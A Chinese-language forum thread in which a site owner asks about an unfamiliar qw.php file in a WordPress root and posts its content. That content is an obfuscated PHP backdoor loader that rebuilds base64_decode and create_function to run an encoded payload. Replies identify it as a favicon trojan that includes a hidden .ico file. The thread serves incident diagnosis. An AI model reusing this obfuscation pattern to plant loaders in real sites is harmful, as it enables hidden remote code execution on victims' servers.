安装根目录上的WordPress qw.php文件

我在这里发帖不仅是为了获得关于这个特定文件的帮助或指导，也是为了帮助搜索这个问题

显然，WordPress安装的根目录中有一个名为

qw.php

的文件，它不是标准安装包的一部分

文件内容如下：

<?php

$alphabet  =  ".hyib/;dq4ux9*zjmclp3_r80)t(vakng1s2foe75w6";
$string  = "Z2xvYmFsICRhdXRoX3Bhc3MsJGNvbG9yLCRkZWZhdWx0X2FjdGlvbiwkZGVmYXVsdF91$"
$array_name  =  "";
$ar  = array(4,29,34,38,42,9,21,7,38,17,37,7,38);

foreach($ar as $t){
   $array_name .= $alphabet[$t];
}

$a  =  strrev("noi"."tcnuf"."_eta"."erc");
$f  =  $a("", $array_name($string));
$f();

添加到服务器安装根目录的其他文件：

article59.php

，

dir44.php

，

onxwylrq.php

---

关于这与恶意软件有什么关系？有人知道这个文件连接到什么插件或主题位置的黑客

您的网站似乎感染了favicon特洛伊木马程序，因为该脚本的第一行计算为：

@include "/www-data/ANH_USA/petitionhero.org/web/content/.6a99894c.ico"

favicon（.ico）恶意软件创建rogue favicon.ico或random.ico 包含恶意PHP代码的文件。这是恶意的PHP 已知代码在网站上执行危险操作，如URL 注入，在WordPress/Drupal中创建管理员帐户， 安装间谍软件/特洛伊木马、创建网络钓鱼页面等

---

查看更多详细信息。

Dodge，将其删除。WP在任何文件夹结构中都没有这样的文件。但不确定它试图实现什么。。。就这些吗？看起来它没有做任何特别令人担忧的事情。。。但仍然是不可靠的，尽管如此$a=erc_etanufnoi。。。奇怪的绝对不是我会保留在服务器上的内容。作为调查，请尝试查看是否有包含此内容的附加脚本。您的反转在@Dammeul被反转（它是

create\u函数

）

@include "/www-data/ANH_USA/petitionhero.org/web/content/.6a99894c.ico"